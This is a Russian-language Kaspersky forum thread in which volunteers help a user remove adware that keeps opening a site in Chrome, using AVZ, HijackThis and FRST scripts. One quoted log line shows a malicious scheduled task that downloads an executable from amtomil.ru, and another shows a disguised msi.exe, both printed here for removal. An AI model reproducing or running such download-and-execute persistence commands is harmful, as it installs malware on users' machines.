Перейти к содержанию
Правила раздела
Конкурс по разработке Telegram-бота Kaspersky Club

В Google Chrome периодически открывается вкладка с непонятным сайтом

valmlord

Автор valmlord
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

valmlord Новичок

valmlord

Опубликовано
Опубликовано (изменено)

Добрый времени суток!

 

С недавнего времени столкнулся в браузере с проблемой перехода на  один и тот же сайт на тему моды, хотя антивирус Касперского блокирует разные ссылки в разделе веб-антивируса. Пробовал разные программы для удаления вирусов но проблема не исчезла. Прикрепил логи.

 

P.S.- Заранее благодарен!

CollectionLog-2017.07.23-22.28.zip

Изменено пользователем valmlord
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\korsh\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\korsh\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\korsh\AppData\Roaming\curl\');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.
Ссылка на комментарий
Поделиться на другие сайты
valmlord Новичок

valmlord

Опубликовано
  • Автор
Опубликовано (изменено)

[KLAN-6563168774]

 

Процедуру выполнил.


Новые логи. Но по ссылке все равно переходит.

CollectionLog-2017.07.24-10.21.zip

Изменено пользователем valmlord
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

"Пофиксите" в HijackThis:

O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): MSI - C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\adobe_snr_patch_v2_0___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\korsh\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\korsh\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\korsh\AppData\Roaming\curl\curl.exe (file missing)

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
CreateRestorePoint:
Task: {04FE8142-078C-4C8D-A6B3-E71B3AD58CC2} - System32\Tasks\curls => C:\Users\korsh\AppData\Roaming\curl\curl.exe <==== ATTENTION
Task: {2DA78775-D5A1-4FF5-9F41-1002F45FB790} - System32\Tasks\S-1-5-21-622461763-1730611795-3261267339-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [2017-03-18] (Microsoft Corporation)
Task: {54FD84DD-93B6-412C-8CE7-61652B16E327} - System32\Tasks\MSI => C:\Users\korsh\AppData\Roaming\Microsoft\msi.exe
2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb2647fd6355e3a09
2017-07-21 15:25 - 2017-07-21 15:25 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1ff9e8ccadfb791b
2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignf98c59fb8aa73d65
2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignb0b5818e61bf0927
2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9446595e6997269d
2017-07-21 15:23 - 2017-07-21 15:23 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign45f445e1b114190a
2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne9fa9aecd1457c7e
2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign98654afdbb435ff7
2017-07-18 15:16 - 2017-07-18 15:16 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign2ffdbae189d060a6
2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign72fc4b4c331c5c09
2017-07-18 15:15 - 2017-07-18 15:15 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign586c353c36e55591
2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f142479ecb18662
2017-07-18 13:34 - 2017-07-18 13:34 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7dd8d17cce6f39d6
2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigne844ae9662544afd
2017-07-18 13:27 - 2017-07-18 13:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc21941d5bd6e16fa
2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncc347c9cda4ebc3c
2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign46fe240577c62dc2
2017-07-16 00:00 - 2017-07-16 00:00 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign04e77205866ab10d
2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaae2bc5cb51a03ad
2017-07-11 09:53 - 2017-07-11 09:53 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9ef3b70db1bad327
2017-07-10 20:27 - 2017-07-10 20:27 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc3e8eae2e0d34aae
2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign79a93fa63b208c2d
2017-07-10 20:26 - 2017-07-10 20:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign260ff3c57ba639a0
2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignd594cc74dd597bec
2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignaeb44e4012ba6c33
2017-07-04 09:19 - 2017-07-04 09:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7f4e20de6fe7515e
2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignefe9c21f5b7d0e3c
2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign9c7a4c68c7345059
2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign705a1c5d19a57b0a
2017-07-02 18:01 - 2017-07-02 18:01 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign6e0c021a84327464
2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfcd99e10f5556339
2017-06-30 15:26 - 2017-06-30 15:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncb9814e63a9d1f48
2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign95ee08595d98b80d
2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign813e4e7fc63bf8db
2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7b834b74203ecab4
2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign5e26b5a05b6d84eb
2017-06-30 12:26 - 2017-06-30 12:26 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign412988fc9fcf7c18
2017-06-30 12:21 - 2017-06-30 12:21 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna02dfb9b2cb3be5c
2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigncd891ec1454d2864
2017-06-30 12:20 - 2017-06-30 12:20 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign1fcbc461bcfc12f4
2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignfc08370a161c0e69
2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsignc019c40d13fd2614
2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsigna3617627162fbc7a
2017-06-30 12:19 - 2017-06-30 12:19 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign3994bc82809fbda6
2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign8cfa1402eb65c4ba
2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign81d088a9745af97e
2017-06-30 12:17 - 2017-06-30 12:17 - 00000000 ____D C:\Users\korsh\AppData\Local\Tempzxpsign7c283eb03c9a70a8
2017-07-10 20:21 - 2017-07-15 23:19 - 0004910 _____ () C:\Program Files\Common Files\csdkConfiguratorLog.txt
2017-07-18 13:32 - 2017-07-18 20:20 - 0000033 _____ () C:\Users\korsh\AppData\Roaming\AdobeWLCMCache.dat
2017-06-30 11:19 - 2017-07-24 10:54 - 0000165 _____ () C:\Users\korsh\AppData\Roaming\sp_data.sys
2017-07-21 17:10 - 2017-07-21 17:10 - 0000032 RSHOT () C:\Users\korsh\AppData\Local\t80.dat
2017-06-30 01:59 - 2017-06-30 01:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
EmptyTemp:
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.
 
  • Спасибо (+1) 1
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

1) Проблема только в Хроме? Проверьте в других браузерах.

 

2) Эти расширения все знакомы?

 

CHR Extension: (Скачать музыку с Вконтакте (vk.com)) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-07-13]
CHR Extension: (Диск Google) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-30]
CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]
CHR Extension: (Tab Resize - split screen layouts) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkpenclhmiealbebdopglffmfdiilejc [2017-06-30]
CHR Extension: (YouTube) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-30]
CHR Extension: (uDev - Web Developer Toolbar) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\deeboegbjcnfgidliakhpoapnpomphji [2017-06-30]
CHR Extension: (Tampermonkey) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-06-30]
CHR Extension: (Adobe Acrobat) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-07-11]
CHR Extension: (Fontface Ninja) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\eljapbgkmlngdpckoiiibecpemleclhh [2017-06-30]
CHR Extension: (AdBlock) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-20]
CHR Extension: (Eye Dropper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmdcmlfkchdmnmnmheododdhjedfccka [2017-07-22]
CHR Extension: (LiveReload) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jnihajbhpnppcggbcgedagnkighmdlei [2017-06-30]
CHR Extension: (Speed Dial 2) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-06-30]
CHR Extension: (Бесплатный прокси-сервер VPN Hotspot Shield — разблокировка сайтов) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbejmccbhkncgokjcmghpfloaajcffj [2017-07-22]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-30]
CHR Extension: (Checker Plus for Gmail™) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeopbcgkkoapgobdbedcemjljbihmemj [2017-07-24]
CHR Extension: (Visual Event) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbmmieigblcbldgdokdjpioljjninaim [2017-06-30]
CHR Extension: (Evernote Web Clipper) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2017-06-30]
CHR Extension: (Gmail) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-30]
CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

Ссылка на комментарий
Поделиться на другие сайты
valmlord Новичок

valmlord

Опубликовано
  • Автор
Опубликовано (изменено)

В других браузерах вроде не переходит.


CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]

CHR Extension: (Chrome Media Router) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]

 

Вот это не знаю.

Изменено пользователем valmlord
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

 

 


CHR Extension: (Красоты) - C:\Users\korsh\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbelgoeoihcmnkgkeanmogncgkfichm [2017-06-30]
Вот это удалите через управление расширениями и проверьте проблему.
Ссылка на комментарий
Поделиться на другие сайты
valmlord Новичок

valmlord

Опубликовано
  • Автор
Опубликовано (изменено)

У Google chrome в расширениях нету его в списках. Можно папку с ним через проводник удалить?

 

Жесть какая-то, первый раз сталкиваюсь с таким вирусом неудоляемым).

Изменено пользователем valmlord
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Краб
      Google Chrome
      Автор Краб
      Заметил что у каждого браузера есть своя тема, а у Chrome нету.
      Обсуждаем тут
       
    • Простой пользователь
      kaspersky protection и Google Chrome
      Автор Простой пользователь
      Здравствуйте! Пользуюсь Google Chrome, дня 2 назад заметил, что перестало работать расширение kaspersky protection.
      Удалил расширение, но при попытке заново установить выяснилось, что в магазине Google Chrome расширения kaspersky protection нет.
      Проверил на другом компьютере в магазине Google Chrome kaspersky protection не находится.
      Подскажите Google перестал сотрудничать с Лабораторией Касперского?
      И не подскажите куда исчез  kaspersky protection из магазина в Google Chrome?
    • Myk-88
      Вирус google\chrome\updater.exe
      Автор Myk-88
      Не посмотрев ткнул exe файл, скачанный случайно вместо книги и сразу заметил неровную работу кулеров, посмотрел в диспетчере задач C:\ProgramData\Google\Chrome\updater.exe каждые несколько секунд запускает Sandboxie Service и грузит процессор > 50%. Сам файл после удаления восстанавливается. Dr.Web CureIt!. не нашел вирус, MinerSearch нашел, удалил, но все также возвращается и грузит проц. Прошу помощи, логи прикрепил.
      CollectionLog-2025.04.03-22.07.zip
    • RussiaRuleZzZ
      [РЕШЕНО] FireFox открывает вкладки с рекламой
      Автор RussiaRuleZzZ
      Здравствуйте.
       
      Windows 10 x64.
      FireFox стал открывать странички с различной рекламой, игр, казино и т.д. В том числе странички на ХХХ сайты. Рандомно.
      Скан др. Веб показал вредоносные файлы, они были удалены. НО это было сделано до обращения, поэтому информация не сохранена, что там было. ЭТо не помогло, проблема осталась.
      Изначально стоит КИС с лицензией, но судя по всему он не предотвратил попадание какого-то вируса рекламы.
       
      Прикладываю CollectionLog-2020.05.16-13.23.zip
      Заранее спасибо.
      CollectionLog-2020.05.16-13.23.zip
    • Bercolitt
      Странное поведение при заходе на mail.yandex через Google Chrome.
      Автор Bercolitt
      Если попытаться зайти в свой почтовый ящик mail.yandex через аккаунт с неправильным паролем, форма входа в аккаунт начинает быстро моргаться не реагируя на команды управление. Такое впечатление, что идет подбор пароля в автоматическом режиме. После перезагрузки закладки браузера,  учетная запись  ящика  блокируется.
      Если в приложении Kaspersky Password Manager с одним почтовым сервером связаны несколько учетных записей, то выбрать конкретную учетную запись для переходла не получается. Видишь одну учетную запись, а улетает совсем по другой.
×
×
  • Создать...